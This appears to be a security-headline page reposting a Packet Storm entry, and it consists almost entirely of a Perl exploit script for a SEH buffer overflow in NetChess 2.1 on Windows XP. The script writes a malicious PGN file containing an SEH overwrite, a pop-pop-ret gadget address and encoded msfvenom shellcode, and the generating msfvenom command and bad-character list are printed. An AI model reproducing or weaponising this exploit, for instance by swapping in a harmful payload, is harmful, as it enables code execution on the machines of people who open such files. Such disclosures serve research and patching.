Security
Headlines
HeadlinesLatestCVEs

Headline

NetChess 2.1 Buffer Overflow

NetChess version 2.1 suffers from a buffer overflow vulnerability.

Packet Storm
#vulnerability#windows#perl#buffer_overflow#auth
# Exploit Title: NetChess2.1 Buffer Overflow (SEH)# Date: 8/1/2022# Exploit Author: Ugur Eminli# Vendor Homepage: https://sourceforge.net/projects/avmnetchess/# Software Link: https://sourceforge.net/projects/avmnetchess/# Version: 2.1# Tested on: WinXP SP2 Build 2600#!/usr/bin/perlmy $file= "exploit.pgn";my $junk= "\x41" x 336;#JMP short 6bytesmy $seh="\xeb\x06\xcc\xcc";#0x74d31567 : pop edi # pop esi # ret  |  {PAGE_EXECUTE_READ} [oledlg.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: True, v1.0 (C:\WINDOWS\system32\oledlg.dll)my $nseh= "\x67\x15\xd3\x74";my $nop= "\x90" x 10;#bad chars: \x00\x0a\x1a\x2f\x3b\x3c\x3f\x25\x28\x21\x22\x23\x24\x5e\x7b\x2e\x5b\x5d# msfvenom -p windows/exec cmd=calc -e x86/alpha_upper -a x86 --platform windows -f pl -b "\x00\x0a\x1a\x2f\x3b\x3c\x3f\x25\x28\x21\x22\x23\x24\x5e\x7b\x2e\x5b\x5d" EXITFUNC=sehmy $buf = "\x89\xe7\xd9\xcc\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49\x49" ."\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" ."\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" ."\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" ."\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4d" ."\x38\x4c\x42\x53\x30\x43\x30\x45\x50\x33\x50\x4c\x49\x4d" ."\x35\x36\x51\x4f\x30\x35\x34\x4c\x4b\x56\x30\x30\x30\x4c" ."\x4b\x56\x32\x44\x4c\x4c\x4b\x51\x42\x45\x44\x4c\x4b\x34" ."\x32\x47\x58\x54\x4f\x4e\x57\x31\x5a\x57\x56\x36\x51\x4b" ."\x4f\x4e\x4c\x47\x4c\x45\x31\x43\x4c\x44\x42\x56\x4c\x57" ."\x50\x49\x51\x38\x4f\x44\x4d\x55\x51\x39\x57\x5a\x42\x5a" ."\x52\x30\x52\x46\x37\x4c\x4b\x51\x42\x52\x30\x4c\x4b\x30" ."\x4a\x57\x4c\x4c\x4b\x50\x4c\x34\x51\x53\x48\x4b\x53\x30" ."\x48\x53\x31\x38\x51\x50\x51\x4c\x4b\x46\x39\x37\x50\x43" ."\x31\x48\x53\x4c\x4b\x50\x49\x44\x58\x5a\x43\x47\x4a\x31" ."\x59\x4c\x4b\x46\x54\x4c\x4b\x33\x31\x49\x46\x46\x51\x4b" ."\x4f\x4e\x4c\x49\x51\x38\x4f\x44\x4d\x55\x51\x39\x57\x30" ."\x38\x4b\x50\x44\x35\x4c\x36\x55\x53\x53\x4d\x4a\x58\x47" ."\x4b\x53\x4d\x57\x54\x43\x45\x4a\x44\x50\x58\x4c\x4b\x46" ."\x38\x31\x34\x45\x51\x59\x43\x43\x56\x4c\x4b\x44\x4c\x50" ."\x4b\x4c\x4b\x46\x38\x45\x4c\x33\x31\x39\x43\x4c\x4b\x45" ."\x54\x4c\x4b\x45\x51\x58\x50\x4d\x59\x37\x34\x31\x34\x51" ."\x34\x51\x4b\x31\x4b\x45\x31\x31\x49\x30\x5a\x50\x51\x4b" ."\x4f\x4b\x50\x51\x4f\x51\x4f\x51\x4a\x4c\x4b\x34\x52\x4a" ."\x4b\x4c\x4d\x31\x4d\x53\x5a\x45\x51\x4c\x4d\x4c\x45\x4e" ."\x52\x55\x50\x45\x50\x33\x30\x56\x30\x45\x38\x36\x51\x4c" ."\x4b\x32\x4f\x4d\x57\x4b\x4f\x58\x55\x4f\x4b\x4b\x4e\x44" ."\x4e\x37\x42\x4b\x5a\x42\x48\x59\x36\x4a\x35\x4f\x4d\x4d" ."\x4d\x4b\x4f\x49\x45\x47\x4c\x53\x36\x33\x4c\x44\x4a\x4d" ."\x50\x4b\x4b\x4b\x50\x32\x55\x43\x35\x4f\x4b\x47\x37\x54" ."\x53\x54\x32\x52\x4f\x32\x4a\x33\x30\x51\x43\x4b\x4f\x58" ."\x55\x33\x53\x43\x51\x42\x4c\x55\x33\x45\x50\x41\x41";open($FILE,">$file");print $FILE "$junk$seh$nseh$nop$buf$nop";close($FILE);print "\r\n[+] Exploit File Created: $file \n";

Packet Storm: Latest News

ABB Cylon Aspect 3.08.01 vstatConfigurationDownload.php Configuration Download